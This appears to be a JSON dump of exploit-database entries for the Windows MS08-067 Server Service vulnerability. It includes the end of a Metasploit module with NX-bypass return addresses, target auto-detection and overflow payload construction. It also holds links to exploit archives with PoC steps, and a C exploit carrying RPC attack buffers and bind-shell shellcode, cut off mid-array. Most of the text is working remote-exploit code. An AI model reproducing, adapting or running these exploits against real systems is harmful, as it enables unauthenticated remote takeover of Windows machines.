ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Dutch (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596cf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596d17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Norwegian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597cf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597d17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Polish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5941f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x594217c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Portuguese - Brazilian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596ff807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597017c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Portuguese (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x596bf807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x596c17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Russian (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x6fe1f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x6fe217c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Swedish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x597af807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x597b17c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\t\t\t\t\t# Metasploit's NX bypass for XP SP2/SP3\r\n\t\t\t\t\t[ 'Windows XP SP3 Turkish (NX)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x5a78f807,\r\n\t\t\t\t\t\t\t'DisableNX' => 0x5a7917c2,\r\n\t\t\t\t\t\t\t'Scratch' => 0x00020408\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\r\n\r\n\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Missing Targets\r\n\t\t\t\t\t# Key: T=TODO ?=UNKNOWN U=UNRELIABLE\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# [?] Windows Vista SP0 - Not tested yet\r\n\t\t\t\t\t# [?] Windows Vista SP1 - Not tested yet\r\n\t\t\t\t\t#\r\n\t\t\t\t],\r\n\r\n\t\t\t'DisclosureDate' => 'Oct 28 2008'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\r\n=begin\r\n\r\n\r\n\t*** WINDOWS XP SP2/SP3 TARGETS ***\r\n\r\n\r\n\tThis exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX\r\n\tfor the process and then returns back to a call ESI instruction. These addresses are different\r\n\tbetween operating systems, service packs, and language packs, but the steps below can be used to\r\n\tadd new targets.\r\n\r\n\r\n\tIf the target system does not have NX/NX, just place a \"call ESI\" return into both the Ret\tand\r\n\tDisableNX elements of the target hash.\r\n\r\n\tIf the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.\r\n\tFirst obtain the value for the Ret element of the hash with the following command:\r\n\r\n\t$ msfpescan -j esi acgenral.dll\r\n\r\n\tPick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.\r\n\r\n\tNext, find the location of the function we use to disable NX. Use the following command:\r\n\r\n\t$ msfpescan -r \"\\x6A\\x04\\x8D\\x45\\x08\\x50\\x6A\\x22\\x6A\\xFF\" acgenral.dll\r\n\r\n\tThis address should be placed into the DisableNX element of the target hash.\r\n\r\n\tThe Scratch element of 0x00020408 should work on all versions of Windows\r\n\r\n\tThe actual function we use to disable NX looks like this:\r\n\r\n\t\tpush 4\r\n\t\tlea eax, [ebp+arg_0]\r\n\t\tpush eax\r\n\t\tpush 22h\r\n\t\tpush 0FFFFFFFFh\r\n\t\tmov [ebp+arg_0], 2\r\n\t\tcall ds:__imp__NtSetInformationProcess@16\r\n\r\n\r\n\t*** WINDOWS XP NON-NX TARGETS ***\r\n\r\n\r\n\tInstead of bypassing NX, just return directly to a \"JMP ESI\", which takes us to the short\r\n\tjump, and finally the shellcode.\r\n\r\n\r\n\t*** WINDOWS 2003 SP2 TARGETS ***\r\n\r\n\r\n\tThere are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,\r\n\tboth of these are inside NTDLL.DLL and use a return method that is not directly compatible\r\n\twith our call stack. To solve this, Brett Moore figured out a multi-step return call chain\r\n\tthat eventually leads to the NX bypass function.\r\n\r\n\r\n\t*** WINDOWS 2000 TARGETS ***\r\n\r\n\r\n\tNo NX to bypass, just return directly to a \"JMP EDX\", which takes us to the short\r\n\tjump, and finally the shellcode.\r\n\r\n\r\n\t*** WINDOWS VISTA TARGETS ***\r\n\r\n\tCurrently untested, will involve ASLR and NX, should be fun.\r\n\r\n\r\n\t*** NetprPathCanonicalize IDL ***\r\n\r\n\r\n\tNET_API_STATUS NetprPathCanonicalize(\r\n\t[in, string, unique] SRVSVC_HANDLE ServerName,\r\n\t[in, string] WCHAR* PathName,\r\n\t[out, size_is(OutbufLen)] unsigned char* Outbuf,\r\n\t[in, range(0,64000)] DWORD OutbufLen,\r\n\t[in, string] WCHAR* Prefix,\r\n\t[in, out] DWORD* PathType,\r\n\t[in] DWORD Flags\r\n\t);\r\n\r\n=end\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect()\r\n\t\tsmb_login()\r\n\r\n\t\t# Use a copy of the target\r\n\t\tmytarget = target\r\n\r\n\r\n\t\tif(target['auto'])\r\n\r\n\t\t\tmytarget = nil\r\n\r\n\t\t\tprint_status(\"Automatically detecting the target...\")\r\n\t\t\tfprint = smb_fingerprint()\r\n\r\n\t\t\tprint_status(\"Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}\")\r\n\r\n\t\t\t# Bail early on unknown OS\r\n\t\t\tif(fprint['os'] == 'Unknown')\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\t# Windows 2000 is mostly universal\r\n\t\t\tif(fprint['os'] == 'Windows 2000')\r\n\t\t\t\tmytarget = self.targets[1]\r\n\t\t\tend\r\n\r\n\t\t\t# Windows XP SP0/SP1 is mostly universal\r\n\t\t\tif(fprint['os'] == 'Windows XP' and fprint['sp'] == \"Service Pack 0 / 1\")\r\n\t\t\t\tmytarget = self.targets[2]\r\n\t\t\tend\r\n\r\n\t\t\t# Windows 2003 SP0 is mostly universal\r\n\t\t\tif(fprint['os'] == 'Windows 2003' and fprint['sp'] == \"No Service Pack\")\r\n\t\t\t\tmytarget = self.targets[5]\r\n\t\t\tend\r\n\r\n\t\t\t# Windows 2003 R2 is treated the same as 2003\r\n\t\t\tif(fprint['os'] == 'Windows 2003 R2')\r\n\t\t\t\tfprint['os'] = 'Windows 2003'\r\n\t\t\tend\r\n\r\n\t\t\t# Service Pack match must be exact\r\n\t\t\tif((not mytarget) and fprint['sp'].index('+'))\r\n\t\t\t\tprint_error(\"Could not determine the exact service pack\")\r\n\t\t\t\tprint_status(\"Auto-targeting failed, use 'show targets' to manually select one\")\r\n\t\t\t\tdisconnect\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\t# Language Pack match must be exact or we default to English\r\n\t\t\tif((not mytarget) and fprint['lang'] == 'Unknown')\r\n\t\t\t\tprint_status(\"We could not detect the language pack, defaulting to English\")\r\n\t\t\t\tfprint['lang'] = 'English'\r\n\t\t\tend\r\n\r\n\t\t\t# Normalize the service pack string\r\n\t\t\tfprint['sp'].gsub!(/Service Pack\\s+/, 'SP')\r\n\r\n\t\t\tif(not mytarget)\r\n\t\t\t\tself.targets.each do |t|\r\n\t\t\t\t\tif(t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(NX\\)/)\r\n\t\t\t\t\t\tmytarget = t\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\tif(not mytarget)\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"Selected Target: #{mytarget.name}\")\r\n\t\tend\r\n\r\n\t\t#\r\n\t\t# Build the malicious path name\r\n\t\t#\r\n\r\n\t\tpadder = [*(\"A\"..\"Z\")]\r\n\t\tpad = \"A\"\r\n\t\twhile(pad.length < 7)\r\n\t\t\tc = padder[rand(padder.length)]\r\n\t\t\tnext if pad.index(c)\r\n\t\t\tpad += c\r\n\t\tend\r\n\r\n\t\tprefix = \"\\\\\"\r\n\t\tpath = \"\"\r\n\t\tserver = Rex::Text.rand_text_alpha(rand(8)+1).upcase\r\n\r\n\r\n\t\t#\r\n\t\t# Windows 2000, XP (NX), and 2003 (NO NX) mytargets\r\n\t\t#\r\n\t\tif(not mytarget['RetDec'])\r\n\r\n\t\t\tjumper = Rex::Text.rand_text_alpha(70).upcase\r\n\t\t\tjumper[ 4,4] = [mytarget.ret].pack(\"V\")\r\n\t\t\tjumper[50,8] = make_nops(8)\r\n\t\t\tjumper[58,2] = \"\\xeb\\x62\"\r\n\r\n\t\t\tpath =\r\n\t\t\t\tRex::Text.to_unicode(\"\\\\\") +\r\n\r\n\t\t\t\t# This buffer is removed from the front\r\n\t\t\t\tRex::Text.rand_text_alpha(100) +\r\n\r\n\t\t\t\t# Shellcode\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Relative path to trigger the bug\r\n\t\t\t\tRex::Text.to_unicode(\"\\\\..\\\\..\\\\\") +\r\n\r\n\t\t\t\t# Extra padding\r\n\t\t\t\tRex::Text.to_unicode(pad) +\r\n\r\n\t\t\t\t# Writable memory location (static)\r\n\t\t\t\t[mytarget['Scratch']].pack(\"V\") + # EBP\r\n\r\n\t\t\t\t# Return to code which disables NX (or just the return)\r\n\t\t\t\t[ mytarget['DisableNX'] || mytarget.ret ].pack(\"V\") +\r\n\r\n\t\t\t\t# Padding with embedded jump\r\n\t\t\t\tjumper +\r\n\r\n\t\t\t\t# NULL termination\r\n\t\t\t\t\"\\x00\" * 2\r\n\t\t#\r\n\t\t# Windows 2003 SP2 (NX) mytargets\r\n\t\t#\r\n\t\telse\r\n\r\n\t\t\tjumper = Rex::Text.rand_text_alpha(70).upcase\r\n\t\t\tjumper[ 0,4] = [mytarget['RetDec']].pack(\"V\")# one more to Align and make room\r\n\r\n\t\t\tjumper[ 4,4] = [mytarget['RetDec']].pack(\"V\") # 4 more for space\r\n\t\t\tjumper[ 8,4] = [mytarget['RetDec']].pack(\"V\")\r\n\t\t\tjumper[ 12,4] = [mytarget['RetDec']].pack(\"V\")\r\n\t\t\tjumper[ 16,4] = [mytarget['RetDec']].pack(\"V\")\r\n\r\n\t\t\tjumper[ 20,4] = [mytarget['RetPop']].pack(\"V\")# pop to EBP\r\n\t\t\tjumper[ 24,4] = [mytarget['DisableNX']].pack(\"V\")\r\n\r\n\t\t\tjumper[ 56,4] = [mytarget['JmpESP']].pack(\"V\")\r\n\t\t\tjumper[ 60,4] = [mytarget['JmpESP']].pack(\"V\")\r\n\t\t\tjumper[ 64,2] = \"\\xeb\\x02\" # our jump\r\n\t\t\tjumper[ 68,2] = \"\\xeb\\x62\"\t\t\t\t\t # original\r\n\r\n\t\t\tpath =\r\n\t\t\t\tRex::Text.to_unicode(\"\\\\\") +\r\n\r\n\t\t\t\t# This buffer is removed from the front\r\n\t\t\t\tRex::Text.rand_text_alpha(100) +\r\n\r\n\t\t\t\t# Shellcode\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Relative path to trigger the bug\r\n\t\t\t\tRex::Text.to_unicode(\"\\\\..\\\\..\\\\\") +\r\n\r\n\t\t\t\t# Extra padding\r\n\t\t\t\tRex::Text.to_unicode(pad) +\r\n\r\n\t\t\t\t# Writable memory location (static)\r\n\t\t\t\t[mytarget['Scratch']].pack(\"V\") + # EBP\r\n\r\n\t\t\t\t# Return to code which disables NX (or just the return)\r\n\t\t\t\t[mytarget['RetDec']].pack(\"V\") +\r\n\r\n\t\t\t\t# Padding with embedded jump\r\n\t\t\t\tjumper +\r\n\r\n\t\t\t\t# NULL termination\r\n\t\t\t\t\"\\x00\" * 2\r\n\r\n\t\tend\r\n\r\n\t\thandle = dcerpc_handle(\r\n\t\t\t'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\r\n\t\t\t'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\r\n\t\t)\r\n\r\n\t\tdcerpc_bind(handle)\r\n\r\n\t\tstub =\r\n\t\t\tNDR.uwstring(server) +\r\n\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\tNDR.long(rand(1024)) +\r\n\t\t\tNDR.wstring(prefix) +\r\n\t\t\tNDR.long(4097) +\r\n\t\t\tNDR.long(0)\r\n\r\n\t\t# NOTE: we don't bother waiting for a response here...\r\n\t\tprint_status(\"Attempting to trigger the vulnerability...\")\r\n\t\tdcerpc.call(0x1f, stub, false)\r\n\r\n\t\t# Cleanup\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16362/"}, {"lastseen": "2016-02-01T00:47:14", "bulletinFamily": "exploit", "description": "MS Windows Server Service Code Execution Exploit (MS08-067) (Univ). CVE-2008-4250. Remote exploit for windows platform", "modified": "2008-10-26T00:00:00", "published": "2008-10-26T00:00:00", "id": "EDB-ID:6841", "href": "https://www.exploit-db.com/exploits/6841/", "type": "exploitdb", "title": "Microsoft Windows Server - Code Execution Exploit MS08-067 Univ", "sourceData": "MS08-067 Exploit for CN by EMM\r\n\r\nexploit:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar (2008-MS08-067.rar)\r\n\r\n# milw0rm.com [2008-10-26]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6841/"}, {"lastseen": "2016-02-01T00:44:51", "bulletinFamily": "exploit", "description": "MS Windows Server Service Code Execution PoC (MS08-067). CVE-2008-4250. Dos exploit for windows platform", "modified": "2008-10-23T00:00:00", "published": "2008-10-23T00:00:00", "id": "EDB-ID:6824", "href": "https://www.exploit-db.com/exploits/6824/", "type": "exploitdb", "title": "Microsoft Windows Server - Code Execution PoC MS08-067", "sourceData": "In vstudio command prompt:\r\n\r\n mk.bat\r\n\r\nnext:\r\n\r\n attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)\r\n\r\n net use \\\\IPADDRESS\\IPC$ /user:user creds\r\n die \\\\IPADDRESS \\pipe\\srvsvc\r\n\r\n In some cases, /user:\"\" \"\", will suffice (i.e., anonymous connection)\r\n\r\nYou should get EIP -> 00 78 00 78, a stack overflow (like a guard page\r\nviolation), access violation, etc. However, in some cases, you will get\r\nnothing.\r\n\r\nThis is because it depends on the state of the stack prior to the \"overflow\".\r\nYou need a slash on the stack prior to the input buffer.\r\n\r\nSo play around a bit, you'll get it working reliably...\r\n\r\npoc:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6824.zip (2008-ms08-067.zip)\r\n\r\n# milw0rm.com [2008-10-23]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6824/"}, {"lastseen": "2016-02-01T01:25:10", "bulletinFamily": "exploit", "description": "MS Windows Server Service Code Execution Exploit (MS08-067). CVE-2008-4250. Remote exploit for windows platform", "modified": "2008-11-12T00:00:00", "published": "2008-11-12T00:00:00", "id": "EDB-ID:7104", "href": "https://www.exploit-db.com/exploits/7104/", "type": "exploitdb", "title": "Microsoft Windows Server - Code Execution Exploit MS08-067", "sourceData": "/*\r\nMS08-067 Remote Stack Overflow Vulnerability Exploit\r\n\r\nAuthor: Polymorphours\r\nEmail: Polymorphours@whitecell.org\r\nHomepage:http://www.whitecell.org\r\nDate: 2008-10-28\r\n*/\r\n\r\n#include \"stdafx.h\"\r\n#include <winsock2.h>\r\n#include <Rpc.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#pragma comment(lib, \"mpr\")\r\n#pragma comment(lib, \"Rpcrt4\")\r\n#pragma comment(lib, \"ws2_32\")\r\n\r\nstruct RPCBIND\r\n{\r\n\tBYTE VerMaj;\r\n\tBYTE VerMin;\r\n\tBYTE PacketType;\r\n\tBYTE PacketFlags;\r\n\tDWORD DataRep;\r\n\tWORD FragLength;\r\n\tWORD AuthLength;\r\n\tDWORD CallID;\r\n\tWORD MaxXmitFrag;\r\n\tWORD MaxRecvFrag;\r\n\tDWORD AssocGroup;\r\n\tBYTE NumCtxItems;\r\n\tWORD ContextID;\r\n\tWORD NumTransItems;\r\n\tGUID InterfaceUUID;\r\n\tWORD InterfaceVerMaj;\r\n\tWORD InterfaceVerMin;\r\n\tGUID TransferSyntax;\r\n\tDWORD SyntaxVer;\r\n};\r\n\r\nstruct RPCFUNC\r\n{\r\n\tBYTE VerMaj;\r\n\tBYTE VerMin;\r\n\tBYTE PacketType;\r\n\tBYTE PacketFlags;\r\n\tDWORD DataRep;\r\n\tWORD FragLength;\r\n\tWORD AuthLength;\r\n\tDWORD CallID;\r\n\tDWORD AllocHint;\r\n\tWORD ContextID;\r\n\tWORD Opnum;\r\n};\r\n\r\nBYTE PRPC[0x48] = {\r\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,\r\n0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,\r\n0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,\r\n0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\r\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\r\n\r\nBYTE EXPLOIT[] =\r\n\"\\x05\\x00\"\r\n\"\\x00\\x03\\x10\\x00\\x00\\x00\\xA4\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x94\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x1f\\x00\"\r\n\"\\x00\\x00\\x00\\x00\"\r\n\"\\x2F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2F\\x00\\x00\\x00\"\r\n\r\n\"\\x5c\\x00\"\r\n\"\\x41\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\"\r\n\r\n\"\\x41\\x41\"\r\n\r\n\"\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\"\r\n\r\n\"\\x12\\x45\\xfa\\x7f\"\t// jmp esp\r\n\"\\x90\\x8B\\xF4\\x81\"\r\n\"\\x3E\\x90\\x90\\x90\\x90\\x74\\x04\\x4E\\x4E\\xEB\\xF4\\x33\\xC9\\x33\\xDB\\xB1\"\r\n\"\\x01\\xC1\\xE1\\x09\\x8B\\xFC\\x4B\\xC1\\xE3\\x0D\\x23\\xFB\\x57\\xF3\\xA4\\x5F\"\r\n// \"\\xB1\\x01\\xC1\\xE1\\x09\\x2B\\xE1\\xFF\\xE7\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\r\n\"\\x83\\xEC\\x70\\x90\\x90\\x90\\x90\\xFF\\xE7\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\r\n\"\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x5C\\x00\"\r\n\"\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\r\n\r\n\r\n\r\nBYTE POP[] =//stub header RPCFUNC structure\r\n\"\\x05\\x00\"\r\n\"\\x00\\x03\\x10\\x00\\x00\\x00\\xE4\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\xD4\\x01\"\r\n\"\\x00\\x00\\x00\\x00\\x1f\\x00\"\r\n\"\\x00\\x00\\x00\\x00\"\r\n\"\\xCF\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xCF\\x00\\x00\\x00\"\r\n\r\n\"\\x5c\\x00\"\r\n\"\\x41\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\"\r\n\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\r\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\xCC\\x41\"\r\n\r\n\"\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\"\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x5C\\x00\"\r\n\"\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\r\n\r\nunsigned char bind_shellcode[] =\r\n// \"\\xCC\"\r\n// \"\\x83\\xEC\\x40\"\t// sub esp, 0x70\r\n\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xad\"\r\n\"\\x07\\xe6\\x4a\\x83\\xeb\\xfc\\xe2\\xf4\\x51\\x6d\\x0d\\x07\\x45\\xfe\\x19\\xb5\"\r\n\"\\x52\\x67\\x6d\\x26\\x89\\x23\\x6d\\x0f\\x91\\x8c\\x9a\\x4f\\xd5\\x06\\x09\\xc1\"\r\n\"\\xe2\\x1f\\x6d\\x15\\x8d\\x06\\x0d\\x03\\x26\\x33\\x6d\\x4b\\x43\\x36\\x26\\xd3\"\r\n\"\\x01\\x83\\x26\\x3e\\xaa\\xc6\\x2c\\x47\\xac\\xc5\\x0d\\xbe\\x96\\x53\\xc2\\x62\"\r\n\"\\xd8\\xe2\\x6d\\x15\\x89\\x06\\x0d\\x2c\\x26\\x0b\\xad\\xc1\\xf2\\x1b\\xe7\\xa1\"\r\n\"\\xae\\x2b\\x6d\\xc3\\xc1\\x23\\xfa\\x2b\\x6e\\x36\\x3d\\x2e\\x26\\x44\\xd6\\xc1\"\r\n\"\\xed\\x0b\\x6d\\x3a\\xb1\\xaa\\x6d\\x0a\\xa5\\x59\\x8e\\xc4\\xe3\\x09\\x0a\\x1a\"\r\n\"\\x52\\xd1\\x80\\x19\\xcb\\x6f\\xd5\\x78\\xc5\\x70\\x95\\x78\\xf2\\x53\\x19\\x9a\"\r\n\"\\xc5\\xcc\\x0b\\xb6\\x96\\x57\\x19\\x9c\\xf2\\x8e\\x03\\x2c\\x2c\\xea\\xee\\x48\"\r\n\"\\xf8\\x6d\\xe4\\xb5\\x7d\\x6f\\x3f\\x43\\x58\\xaa\\xb1\\xb5\\x7b\\x54\\xb5\\x19\"\r\n\"\\xfe\\x54\\xa5\\x19\\xee\\x54\\x19\\x9a\\xcb\\x6f\\xf7\\x16\\xcb\\x54\\x6f\\xab\"\r\n\"\\x38\\x6f\\x42\\x50\\xdd\\xc0\\xb1\\xb5\\x7b\\x6d\\xf6\\x1b\\xf8\\xf8\\x36\\x22\"\r\n\"\\x09\\xaa\\xc8\\xa3\\xfa\\xf8\\x30\\x19\\xf8\\xf8\\x36\\x22\\x48\\x4e\\x60\\x03\"\r\n\"\\x